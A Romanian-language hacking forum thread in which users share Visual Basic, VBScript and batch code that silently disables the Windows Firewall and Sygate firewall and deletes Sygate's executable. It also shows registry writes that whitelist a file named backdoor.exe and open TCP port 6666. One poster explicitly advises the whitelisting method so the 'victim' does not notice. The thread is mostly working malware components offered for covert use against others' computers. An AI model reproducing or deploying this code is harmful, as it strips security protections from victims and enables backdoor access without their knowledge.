Jump to content
sony_buzi

Disabble FIrewall (Windows&Syagte) VB code

Recommended Posts

Din pacate pentru firewallu de la windowsu nu am gasit un fisier ca sa il setrg sa nu mai mearga.

Private Sub Form_Load()

App.TaskVisible = False

Me.Visible = False

Shell "sc config sharedaccess start= disabled", vbHide

Shell "net stop smcservice", vbHide

Shell "sc config smcservice start= disabled", vbHide

Kill "C:Program FilesSygateSPFsmc.exe"

Shell "netsh firewall set opmode mode = disable", vbHide

End Sub

Link to comment
Share on other sites

sony_buzi wrote: Din pacate pentru firewallu de la windowsu nu am gasit un fisier ca sa il setrg sa nu mai mearga.

nu trebuie sa stergi nimic..trebuie sa faci niste intrati in registry ...imi pare rau ca nu imi amintesc exact unde ce si cum

data viitoare scrie si in ce este codul ....stiu ca este vb..dar poate altii nu stiu :)

eu folosesc sygate :-S il schimb acum :D

Link to comment
Share on other sites

pentru a permite orice activitate a unui executabil (in cazul de fata cel din C:WINDOWSbackdoor.exe) folositi:

Dim w

Set w = Createobject("Wscript.Shell")

w.regwrite "HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsListNume", "C:WINDOWSbackdoor.exe:*:Enabled:@xpsp2res.dll,-22019", "REG_SZ"

pentru a permite orice activitate pe un anumit port (in cazul de fata 6666) folositi:

Dim w

Set w = Createobject("Wscript.Shell")

w.regwrite "HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileGloballyOpenPortsList6666:TCP", "6666:TCP:*:Enabled:@xpsp2res.dll,-22003", "REG_SZ"

Link to comment
Share on other sites

pentru a dezactiva firewalu de la win, scrieti asta intr-un fisier gol cu extensia bat sau cmd..2click :D

pentru vb stiti voi cum sa modificatzi :D...

@reg add "HKLMSYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile" /v EnableFirewall /t REG_DWORD /d 00000000 /f>NUL
@reg add "HKLMSYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile" /v DoNotAllowExceptions /t REG_DWORD /d 00000000 /f>NUL
@reg add "HKLMSYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile" /v DisableNotifications /t REG_DWORD /d 00000001 /f>NUL

avetzi grija ca nu e chiar corect ce scrie mai sus, sunt doar 3 linii, de la @reg add... pana la >nul

.......bafta

Link to comment
Share on other sites

sony_buzi wrote: Nu-mi spune ca daca bag codu ala nu o sa mai aiba firewallurile treaba cu el...

bineinteles ca nu o sa mai aiba :)

incearca si o sa te convingi ... am uitat sa specific ca metoda se aplica doar pt fw-ul win-ului

de ce sa dezactivezi firewall-ul (caz in care victima se poate prinde ca e ceva putred la mijloc) mai bine folosesti metoda asta ..

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...